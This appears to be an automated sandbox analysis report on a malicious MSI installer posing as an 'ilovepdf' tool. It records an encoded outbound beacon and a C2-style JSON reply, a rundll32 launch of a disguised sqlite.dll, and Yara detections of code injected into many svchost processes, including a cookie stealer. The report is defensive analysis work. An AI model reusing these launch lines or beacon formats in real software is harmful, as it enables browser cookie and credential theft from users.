2021-10-24 10:50:09 UTC | 6 | OUT | Data Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 5a 70 61 47 64 6f 65 36 62 65 70 4b 75 54 6f 4b 53 6d 62 35 53 6d 33 71 53 6d 31 39 54 57 6f 74 66 57 33 36 4c 58 71 4b 6d 69 71 61 6d 6d 6f 4b 53 6d 59 32 64 35 62 47 39 69 65 32 39 34 70 74 36 6b 70 71 75 48 33 39 79 5a 72 5a 71 6f 71 74 61 72 71 74 66 57 68 36 6a 63 71 6f 66 57 68 74 53 72 71 5a 76 66 33 35 71 74 68 6f 61 59 70 71 43 6b 70 6d 4e 71 65 35 61 6d 33 71 53 6d 33 4b 4c 66 70 71 43 6b 70 70 5a 37 66 57 39 6c 59 71 62 65 70 4b 61 40 6e 61 61 67 70 4b 5a 6f 6e 35 52 37 70 74 36 6b 71 36 43 6b 70 6d 70 37 6c 71 62 65 70 4b 6e 57 6b 77 3d 3d
Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaZpaGdoe6bepKuToKSmb5Sm3qSm19TWotfW36LXqKmiqammoKSmY2d5bG9ie294pt6kpquH39yZrZqoqtarqtfWh6jcqofWhtSrqZvf35qthoaYpqCkpmNqe5am3qSm3KLfpqCkppZ7fW9lYqbepKa@naagpKZon5R7pt6kq6Ckpmp7lqbepKnWkw==
2021-10-24 10:50:10 UTC | 6 | IN | HTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:10 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=68TwEML4Cj7sr1PqJIQznNgRxV0YJLB%2FVClWpmfGY%2BZBID3jAMRjNo3X0iHULIZ1iakt4GBHxNqyGwnuU5LL9UfYzuDL2HtEJtOhLokMJjLeK4PIwNbJdMzMUjcJOG05sseGpDs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a48489c84a85-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-10-24 10:50:10 UTC | 7 | IN | Data Raw: 34 65 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 2c 22 63 6b 22 3a 5b 5d 2c 22 69 6e 73 63 6b 22 3a 5b 5d 7d 7d 0d 0a
Data Ascii: 4e{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1,"ck":[],"insck":[]}}
2021-10-24 10:50:10 UTC | 7 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  System Behavior

                                                                                  General

                                                                                  Start time:12:49:02
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi'
                                                                                  Imagebase:0x7ff7a5c50000
                                                                                  File size:66048 bytes
                                                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:02
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                  Imagebase:0x7ff7a5c50000
                                                                                  File size:66048 bytes
                                                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:07
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\Installer\MSIFBC3.tmp
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\Installer\MSIFBC3.tmp
                                                                                  Imagebase:0x400000
                                                                                  File size:7196212 bytes
                                                                                  MD5 hash:B6D7559D31D4FF2D02338DF9CEF2FBD8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:12:49:08
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
                                                                                  Imagebase:0x400000
                                                                                  File size:3014144 bytes
                                                                                  MD5 hash:D73DDB8F6B777CC6411FD3CA254F3DEC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:12:49:23
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
                                                                                  Imagebase:0xb00000
                                                                                  File size:61952 bytes
                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.415787297.0000000004D00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:24
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000003.327914667.0000024B7D060000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000000.328311763.0000024B7D0D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:25
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.814263097.0000012E17674000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.423845789.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.341269563.0000012E17682000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.423609117.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.428213354.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_CookieStealer, Description: Yara detected Cookie Stealer, Source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.425960077.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422182454.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.818890783.0000012E17800000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.347751954.0000012E17682000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_CookieStealer, Description: Yara detected Cookie Stealer, Source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.822239151.0000012E17870000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422945945.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422081412.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:25
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000000.334220088.00000204F3380000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000002.535149996.00000204F3380000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000003.332207196.00000204F3310000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:28
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000000.337739160.00000233426D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000003.337258636.0000023342660000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000002.814492712.00000233426D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:30
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000002.813792020.000001D91AAD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000000.341208175.000001D91AAD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:31
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000002.823826621.000002F2C5C00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000000.344698282.000002F2C5C00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:33
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000003.347514859.00000222CAAB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000002.815078501.00000222CAB20000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000000.348676580.00000222CAB20000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:35
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000002.815819484.0000028621CD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000003.351653681.0000028621C60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000000.353917574.0000028621CD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:49:38
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000002.815503783.000001DC51FB0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000000.360038212.000001DC51FB0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000003.358956520.000001DC51F40000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:49:40
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000003.363362333.000002216B840000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000002.819987063.000002216B8B0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000000.364403941.000002216B8B0000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:49:42
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000002.832381229.000002743A320000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000000.373121190.000002743A320000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000003.369691335.000002743A2B0000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:49:46
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000002.813715548.000001111AC00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000000.376992650.000001111AC00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000003.376362360.000001111A990000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:49:48
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000002.816236528.0000022F12740000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000000.380584076.0000022F12740000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:49:50
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000000.384736630.000001BE5CD40000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000002.817922653.000001BE5CD40000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:49:52
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000000.389374530.0000021C23140000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000003.387366099.0000021C22B80000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000002.812231248.0000021C23140000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:49:55
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000002.818183114.00000202B28F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000003.395183978.00000202B2880000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:49:58
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000000.402119778.000001AFBA170000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000002.820529720.000001AFBA170000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000003.400991197.000001AFBA100000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:50:00
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
